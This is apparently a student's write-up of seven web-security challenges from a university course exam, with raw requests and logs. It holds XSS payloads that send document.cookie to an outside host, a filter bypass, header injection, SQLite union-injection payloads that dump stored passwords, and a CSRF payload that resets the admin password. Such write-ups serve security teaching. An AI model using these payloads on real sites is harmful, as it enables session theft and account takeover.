Hello friends. Here are writeups to all the solveable challenges for COMP6443 final exam. If you have questions. Ping @sy on slack.
Challenge 1 writeup
XSS vulnerability on comment submission. no filtering on the html input. so we can include scripts and image tags to our hearts content.
using payload:
<script>new Image().src="http://v.mewy.pw:9447/"+document.cookie;</script><p>test2
user will visit our URL with the document cookie attached.
this is the response we get
129.94.8.184 - - [16/Jun/2017 20:16:57] "GET / HTTP/1.1" 200 -
54.252.177.117 - - [16/Jun/2017 20:19:02] "GET /Flag=FLAG_H8H80SXISOBOIBC6QUTKY2L6UI5NW6B7 HTTP/1.1" 301 -
Referer: http://127.0.0.1/DU83BXTMVWJ8H38V/97b38a5a5fa255374d3f0afbb2bc341003ec1d9d5ae470d06654d7f403f21c16/out.html
Content-Length:
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Connection: Keep-Alive
Host: v.mewy.pw:9447
Accept: */*
Accept-Language: en,*
Content-Type:
Accept-Encoding: gzip, deflate
so flag is correspondingly FLAG_H8H80SXISOBOIBC6QUTKY2L6UI5NW6B7
Challenge 2 writeup
XSS vulnerability on comment submission. Some filtering on the HTML input. so we just bypass hackingshield with some simple case modification
using payload:
<img src=x onerror='new Image().src="http://v.mewy.pw:9447/"+document.cookie;'/>a
this is the response we get
Referer: http://127.0.0.1/DU83BXTMVWJ8H38V/92650041f7b179e5d0bd54fd82e27414e2a20d9d458ef35d592eff9f1427e1b8/out.html
Content-Length:
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Connection: Keep-Alive
Host: v.mewy.pw:9447
Accept: */*
Accept-Language: en,*
Content-Type:
Accept-Encoding: gzip, deflate
() {'anythin': u'Flag=FLAG_PQ5NWR4P3L5D6ZKVC6AFAT7BX7PM2JFP'}
54.252.177.117 - - [16/Jun/2017 20:22:41] "GET /Flag%3DFLAG_PQ5NWR4P3L5D6ZKVC6AFAT7BX7PM2JFP/ HTTP/1.1" 200 -
so flag is correspondingly FLAG_PQ5NWR4P3L5D6ZKVC6AFAT7BX7PM2JFP
Challenge 3 writeup
This was obscure to identify the vuln. I ended up going off the hints given in challenges 1 and 2 for identifying where the vuln was. I checked <base_url>/out.html to figure out what payload it was recieving. (Identifying out.html came from the referrer headers of the previous challenges). This showed me my browser user-agent, so from there its trivial XSS
Request:
POST /DU83BXTMVWJ8H38V/a3573ce9badd0fe415f1257614cce1c1c84dd7a161f2a543f22538d45 d8f4f58/ HTTP/1.1
Host: 54.252.177.117
Connection: close
Content-Length: 51
Cache-Control: max-age=0
Origin: https://54.252.177.117
Upgrade-Insecure-Requests: 1
User-Agent: M<img src=x onerror='new Image().src="http://v.mewy.pw:9447/"+document.cookie;'/>a
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: https://54.252.177.117/DU83BXTMVWJ8H38V/a3573ce9badd0fe415f1257614cce1c1c84dd 7a161f2a543f22538d45d8f4f58/
Accept-Language: en-US,en;q=0.8,ru;q=0.6
Cookie: PHPSESSID=7n2edk2bpm45hgupqgd4t14sr6
name=test&chal1fdbk=123&chal2fdbk=123&chal3fdbk=123
Response:
129.94.8.184 - - [16/Jun/2017 22:28:15] "GET /PHPSESSID%3D7n2edk2bpm45hgupqgd4t14sr6/ HTTP/1.1" 200 -
54.252.177.117 - - [16/Jun/2017 22:29:17] "GET /Flag=FLAG_CHXVQNJFFC0TC5CDL07LR8BNSGTLSJJ0 HTTP/1.1" 301 -
Referer: http://127.0.0.1/DU83BXTMVWJ8H38V/a3573ce9badd0fe415f1257614cce1c1c84dd7a161f 2a543f22538d45d8f4f58/out.html
Content-Length:
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Connection: Keep-Alive
Host: v.mewy.pw:9447
Accept: */*
Accept-Language: en,*
Content-Type:
Accept-Encoding: gzip, deflate
() {'anythin': u'Flag=FLAG_CHXVQNJFFC0TC5CDL07LR8BNSGTLSJJ0'} 54.252.177.117 - - [16/Jun/2017 22:29:17] "GET /Flag%3DFLAG_CHXVQNJFFC0TC5CDL07LR8BNSGTLSJJ0/ HTTP/1.1" 200 –
Flag is FLAG_CHXVQNJFFC0TC5CDL07LR8BNSGTLSJJ0
Challenge 4 writeup
Looks like we have a sqlite injection n the homepage username=test&password=username%27++or+%271%27%3D%271%27%3B%23+
ok so testing for sqlinjection
payload: username'++or+'1'='1' union select 1,2;#
returns Welcome, 1
. Hence, two column injection.
so lets try fingerprinting
@@version doesnt work -> not mysql
version() doesnt work -> not postgresql
so lets try something strings
username' or '1'='1' union select 'asdf',2;#
Welcome, FLAG_KGFZAIJHZAHKM359CR7HINZJDJ12XL8K
lol wtf. I don't understand what condition this was checking for.
flag is FLAG_KGFZAIJHZAHKM359CR7HINZJDJ12XL8K
Request:
POST /DU83BXTMVWJ8H38V/f75711872df5b75b791d28fbba47d0e4067bb026681800cb755ac95c52d467c4/ HTTP/1.1
Host: 54.252.177.117
Connection: close
Content-Length: 69
Cache-Control: max-age=0
Origin: https://54.252.177.117
Upgrade-Insecure-Requests: 1
User-Agent: <?php echo 'hello';?>
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://54.252.177.117/DU83BXTMVWJ8H38V/f75711872df5b75b791d28fbba47d0e4067bb026681800cb755ac95c52d467c4/
Accept-Language: en-US,en;q=0.8,ru;q=0.6
username=test&password=username'++or+'1'='1' union select 'asdf',2;#
Challenge 5 writeup
look at the app. same login as before. so we try sqlinjection again
request:
POST /DU83BXTMVWJ8H38V/858e5fd824090fb2f855e42c53e5cfa25e94a110822ab9ede8e400b95b5f6a19/ HTTP/1.1
Host: 54.252.177.117
Connection: close
Content-Length: 61
Cache-Control: max-age=0
Origin: https://54.252.177.117
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://54.252.177.117/DU83BXTMVWJ8H38V/858e5fd824090fb2f855e42c53e5cfa25e94a110822ab9ede8e400b95b5f6a19/
Accept-Language: en-US,en;q=0.8,ru;q=0.6
username=test&password=username%27+or+%271%27%3D%271%27%3B%23
Response:
HTTP/1.1 200 OK
...
Welcome, whoami
uhhh ok. whoami. looks like we have command injection then?
From fingerprinting, we know its sqlite. So check the sqlite_master table.
Payload:
' union select name, 2 from sqlite_master;#
' union select sql, 2 from sqlite_master;#
Unfortunately, I didn't record this in my haste, but the final request is below
POST /DU83BXTMVWJ8H38V/858e5fd824090fb2f855e42c53e5cfa25e94a110822ab9ede8e400b95b5f6a19/ HTTP/1.1
Host: 54.252.177.117
Connection: close
Content-Length: 105
Cache-Control: max-age=0
Origin: https://54.252.177.117
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://54.252.177.117/DU83BXTMVWJ8H38V/858e5fd824090fb2f855e42c53e5cfa25e94a110822ab9ede8e400b95b5f6a19/
Accept-Language: en-US,en;q=0.8,ru;q=0.6
username=whoami&password=username' union select username || '|'||password,2 from users limit 1 offset 1;#
Protip: sqlite lets you concat fields using ||
operator. So use that to join together multiple fields. Brute forcing is bad for the environment.
Response:
Welcome, whatisthepassword|FLAG_LAL1Y7751ZCFYBSNG6QQGVI46LRZOXOF
Challenge 6 writeup
Freebie
Challenge 7 writuep
OK so we have an app. norman is trolling. register doesnt exist. i presume that its a lie. and theres no LFI
instead we look to CSRF the admin. We know its CSRF because the change password stuff doesnt have CSRF token or a captcha. Brief xss payload works.
<img src=x onerror='new Image().src="http://v.mewy.pw:9447/"+document.cookie;'/>a
indicates that we can infact do shit normally.
so what we will do is CSRF the reset password and make him visit that and reset andmin password to admin
<script>document.location="/DU83BXTMVWJ8H38V/f58ab245d15578e6652f7a7a45cff0cec491bb56cc5601c36df8e351bcb9a016/index.php?p=reset&user=admin&pass=admin";</script>
How nice of norman to let us use GET requests to do all the dirty work. No need to inline my trusty friend jQuery.
OK we csrf and xss'd him
login with admin:admin
Congratulations! Flag is FLAG_FCBJK7MEV3N3178M8F3FPZ4IYB9Y3I5G